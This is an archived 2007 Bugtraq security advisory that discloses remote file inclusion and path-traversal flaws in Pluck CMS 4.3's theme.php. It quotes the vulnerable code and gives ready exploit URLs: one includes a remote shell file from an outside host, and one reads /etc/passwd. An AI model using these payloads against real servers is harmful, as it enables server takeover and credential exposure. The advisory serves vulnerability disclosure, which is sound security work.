lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070802114048.13903.qmail@securityfocus.com> Date: 2 Aug 2007 11:40:48 -0000 From: no-reply@...a-security.net To: bugtraq@...urityfocus.com Subject: Pluck 4.3 themes.php Remote File Inclusion and disclosure __________________ Aria-Security Team __________________ Pluck 4.3 Remote File Inclusion Vendor: http://www.pluck-cms.org/ /path/data/inc/theme.php if Register_global was set as ON then we can use the $dir variable for RFI (is_file($dir."/".$file)) $files[]=$file; else $dirs[]=$dir."/".$file; } } if($dirs) { foreach ($dirs as $dir) { include ("$dir/theme.php"); http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext? ----------------------------------------------------- fputs($file, "<?php \$themepref = \"$cont\"; ?>"); if Register_global was set as ON then we can use the $file variable for disclosure. example: http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS on server) Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info [PERSONAL BLOG]